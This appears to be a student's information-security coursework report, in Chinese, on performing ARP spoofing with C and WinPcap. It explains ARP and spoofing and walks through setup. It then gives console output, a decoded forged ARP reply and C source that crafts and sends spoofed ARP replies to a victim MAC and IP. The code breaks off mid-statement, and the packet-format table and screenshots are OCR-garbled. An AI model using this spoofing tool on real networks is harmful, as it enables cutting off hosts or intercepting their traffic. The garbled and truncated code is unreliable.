C語言實(shí)現(xiàn)ARP攻擊

信息安全原理ARP攻擊班級(jí)：07計(jì)算機(jī)1班姓名：胡益銘學(xué)號(hào)：E07620112ARP原理：ARP，即地址解析協(xié)議，實(shí)現(xiàn)通過IP地址得知其物理地址。在TCP/IP網(wǎng)絡(luò)環(huán)境下，每個(gè)主機(jī)都分配了一個(gè)32位的IP地址，這種互聯(lián)網(wǎng)地址是在網(wǎng)際范圍標(biāo)識(shí)主機(jī)的一種邏輯地址。為了讓報(bào)文在物理網(wǎng)路上傳送，必須知道對(duì)方目的主機(jī)的物理地址。這樣就存在把IP地址變換成物理地址的地址轉(zhuǎn)換問題。以以太網(wǎng)環(huán)境為例，為了正確地向目的主機(jī)傳送報(bào)文，必須把目的主機(jī)的32位IP地址轉(zhuǎn)換成為48位以太網(wǎng)的地址。這就需要在互連層有一組服務(wù)將IP地址轉(zhuǎn)換為相應(yīng)物理地址，這組協(xié)議就是ARP協(xié)議。ARP數(shù)據(jù)報(bào)格式如下：—晚件地觥長度L協(xié)議地址壇理以入網(wǎng)口如峋■6以大網(wǎng)9如!杵美型5協(xié)議911叩發(fā)逮端以大網(wǎng)」粗址￡1比二4發(fā)逢偵IP地址電址IP地址［以或網(wǎng)苜都 技字節(jié)ARF浦季/應(yīng)答 —— 7什么是ARP欺騙：其實(shí)，此起彼伏的瞬間掉線或大面積的斷網(wǎng)大都是ARP欺騙在作怪。ARP欺騙攻擊已經(jīng)成了破壞網(wǎng)吧經(jīng)營的罪魁禍?zhǔn)?，是網(wǎng)吧老板和網(wǎng)管員的心腹大患。從影響網(wǎng)絡(luò)連接通暢的方式來看，ARP欺騙分為二種，一種是對(duì)路由器ARP表的欺騙；另一種是對(duì)內(nèi)網(wǎng)PC的網(wǎng)關(guān)欺騙。第一種ARP欺騙的原理是一一截獲網(wǎng)關(guān)數(shù)據(jù)。它通知路由器一系列錯(cuò)誤的內(nèi)網(wǎng)MAC地址，并按照一定的頻率不斷進(jìn)行，使真實(shí)的地址信息無法通過更新保存在路由器中，結(jié)果路由器的所有數(shù)據(jù)只能發(fā)送給錯(cuò)誤的MAC地址，造成正常PC無法收到信息。第二種ARP欺騙的原理是一一偽造網(wǎng)關(guān)。它的原理是建立假網(wǎng)關(guān)，讓被它欺騙的PC向假網(wǎng)關(guān)發(fā)數(shù)據(jù)，而不是通過正常的路由器途徑上網(wǎng)。在PC看來，就是上不了網(wǎng)了，“網(wǎng)絡(luò)掉線了”。本程序基于C語言，利用winpacp實(shí)現(xiàn)往局域網(wǎng)內(nèi)發(fā)自定義的包，以達(dá)到ARP欺騙的目的。首先從/archive/下載4.0beta1-WpdPack和4.0beta1-WinPcap.exe，版本很多，不過最新版本需要64位的系統(tǒng)，本人32位系統(tǒng)用不了。直接點(diǎn)擊4.0beta1-WinPcap.exe安裝，然后在C:\ProgramFiles\WinPcap下打開rpcapd.exe服務(wù)。然后在VC中，ToolsfOptionsfDirector下配置include和library，將4.0beta1-WpdPack中的include和library庫包含進(jìn)去，本人把4.0beta1-WpdPack放在D盤根目錄下，結(jié)果如下：平臺(tái)IE]〔平臺(tái)IE]〔Win32 3]目錄國:IncludefilesD^ProqramFile磯MicrosoftVisualStudio\VC98\INCLUDEDAProgramFiles\MicrosoftVisualStudio\VC98\MFC\INCLUDED：\Pro(]ramFiles)MicrosoftVisualStudioJVC98yiTLVNCLUDE目錄固:平臺(tái)[E]目錄固:Win32T|LibraryfilesWin32路徑回:D:\Pr0qr3mFiles\MicrosoftVisualStudio\VC98\LIBD^ProgtramFiles^MicrasaHVisualStudioiVC98\MFCJLIB[B；訊麗亙Ai；WBDPACKkW函BACK田亙?nèi)缓笤赑rojectfSettingSfLinkfObjibtTyModules,在文本框的末尾添^“wpcap.libpacket.libws2_32.lib”。常規(guī)|調(diào)試|c/c++rwj|資源|瀏覽信息I分類：窗 3刷新回|怦出文件名: ^Debug/123.exe.寸象辟模塊: ^kernel32.libuser32.libgdi32.libwinspool.libcomdlg32.lib17產(chǎn)生調(diào)試信息 廠忽略全部默認(rèn)庫Qt曾加鏈接 廠產(chǎn)生MAP文件廠允許配置文件工程選項(xiàng)回： Icomdlg32.libadvapi32.libshell32.libole32.lib [a]oleaut32.libuuid.libodbc32.libodbccp32.libwpcap.libwsock32.libws2_32.lib/nologo/subsystem!consolew聃肖編譯運(yùn)行后按提示輸入，內(nèi)容如下:xDeuiceMJPF_GenericDialupAdaptei*Cfidaptei*forgenericdialupandUPNcapture>\Deuice^NPF_<2A933761-706B-40El-833D-7209ED0C0467><UAN<PPP/￡LIP>Interface>xDeuice^NPF_<547462F5-42E8-4FFB-85F9-54DA6BC68BFD><BroadcomNetXtremeGigabitEthernetDriuer（MicrosoftJsPacketScheduler>>linteptheinterfacenunber<l-3>:3輸入被攻擊方的mC處址（如FF-FF-FF-FF-FF-FF則為廣播）B0-1C-23-2IH65-44輸入要假冒的ip弛址章微賽雷矣的境也址20lc232d6544e76201128601866402e7620112a9be160lc§3EG耳44mH ■原DMOKOKOKOK\Device\NPF_GenericDialupAdapter(AdapterforgenericdialupandVPNcapture)\Device\NPF_{2A933761-706B-40E1-833D-7209ED0C0467}(WAN(PPP/SLIP)Interface)\Device\NPF_{547462F5-42E8-4FFB-85F9-54DA60C68BFD}(BroadcomNetXtremeGigabitEthernetDriver(Microsoft'sPacketScheduler))2是二次撥號(hào)的端口，3是本地連接，1不知道是什么，沒看懂。這里選擇3輸入的接收方MAC地址00:1C:23:2D:65:44是我自己的MAC地址，學(xué)校寢室的安全貌似做的很好，輸入別人的MAC地址出不來東西。目標(biāo)IP地址2也是我自己的IP此時(shí)生成的包如下：01c232d654401bfcc21bb6860180640201bfcc21bb6a9be1601c232d6544a9be16000000000000000000解釋如下：以太網(wǎng)首部：01c232d6544〃以太網(wǎng)目的地址，手動(dòng)輸入01bfcc21bb6〃以太網(wǎng)源地址，假的，固定ARP幀：86〃幀類型，0806表示ARP協(xié)議01//硬件類型，0001以太網(wǎng)80〃協(xié)議類型，0800IP協(xié)議6//硬件地址長度4〃協(xié)議地址長度02//op，01表示請(qǐng)求，02表示回復(fù)01bfcc21bb6〃發(fā)送端以太網(wǎng)地址，同首部中以太網(wǎng)源地址a9be16〃發(fā)送端IP地址，假的，固定01c232d6544//目的以太網(wǎng)地址，同首部中目的地址a9be16//目的IP地址，手動(dòng)輸入填充：000000000000000000此時(shí)電腦右下角就會(huì)出現(xiàn)如下圖的提示，IP地址沖突。

liirdowE-系纜錯(cuò)誤iT地址與網(wǎng)貉上的其他系統(tǒng)有沖突。皿勝皿勝5文字-.附main.cpp代碼如下:#include<stdlib.h>#include<stdio.h>#include<pcap.h>intmain(){pcap_if_t*alldevs;//定義一個(gè)網(wǎng)絡(luò)接口的一個(gè)節(jié)點(diǎn)pcap_if_t*d;inti=0,inum=0,j;charerrbuf[PCAP_ERRBUF_SIZE];u_charpacket[60];pcap_t*adhandle;/*獲得設(shè)備列表*/if(pcap_findalldevs(&alldevs,errbuf)==-1){fprintf(stderr,"Errorinpcap_findalldevs:%s\n",errbuf);exit(1);}/*打印列表*/for(d=alldevs;d!=NULL;d=d->next){printf("%d.%s",++i,d->name);if(d->description)printf("(%s)\n",d->description);elseprintf("(Nodescriptionavailable)");}if(i==0){printf("\nNointerfacesfound!MakesureWinPcapisinstalled.");return0;}printf("Entertheinterfacenumber(1-%d):",i);scanf("%d”,&inum);/*跳轉(zhuǎn)到選中的適配器*/for(d=alldevs,i=0;i<inum-1;d=d->next,i++);/*打開適配器*/if((adhandle=pcap_open_live(d->name,//設(shè)備名65536,//要捕捉的數(shù)據(jù)包的部分//65535保證能捕獲到不同數(shù)據(jù)鏈路層上的每個(gè)數(shù)據(jù)包的全部內(nèi)容1,//混雜模式1000,//讀取超時(shí)時(shí)間errbuf〃錯(cuò)誤緩沖池))==NULL){fprintf(stderr,"\nUnabletoopentheadapter.%sisnotsupportedbyWinPcap\n”,d->name);/*釋放設(shè)備列表*/pcap_freealldevs(alldevs);return-1;}printf("輸入被攻擊方的MAC地址(如FF-FF-FF-FF-FF-FF則為廣播)\n");scanf("%2x-%2x-%2x-%2x-%2x-%2x”,&packet[0],&packet[1],&packet[2],&packet[3],&packet[4],&packet[5]);/*以太網(wǎng)目的地址*//*以太網(wǎng)源地址，當(dāng)然是假的*/packet[6]=0x0e;packet[7]=0x07;packet[8]=0X62;packet[9]=0x00;packet[10]=0X01;packet[11]=0x12;/*幀類型，0806表示ARP協(xié)議*/packet[12]=0x08;packet[13]=0x06;/*硬件類型，0001以太網(wǎng)*/packet[14]=0x00;packet[15]=0x01;/*協(xié)議類型，0800IP協(xié)議*/packet[16]=0x08;packet[17]=0x00;/*硬件地址長度*/packet[18]=0x06;/*協(xié)議地址長度*/packet[19]=0x04;/*op，01表示請(qǐng)求，02表示回復(fù)*/packet[20]=0x00;packet[21]=0x02;/*發(fā)送端以太網(wǎng)地址，同首部中以太網(wǎng)源地址*/for(i=22;i<28;i++){packet[i]=packet[i-16];}/*發(fā)送端IP地址*/printf("輸入要假冒的ip地址\n");scanf("%d.%d.%d.%d",&packet[28],&packet[29],&packet[30],&packet[31]);/*目的以太網(wǎng)地址，同首部中目的地址*/for(i=32;i<38;i++){packet[i]=packet[i-32];}/*目的IP地址，手動(dòng)輸入*/printf("輸入被攻擊方的ip地址")；scanf("%d.%d.%d.%d",&packet[38],&packet[39],&packet[40],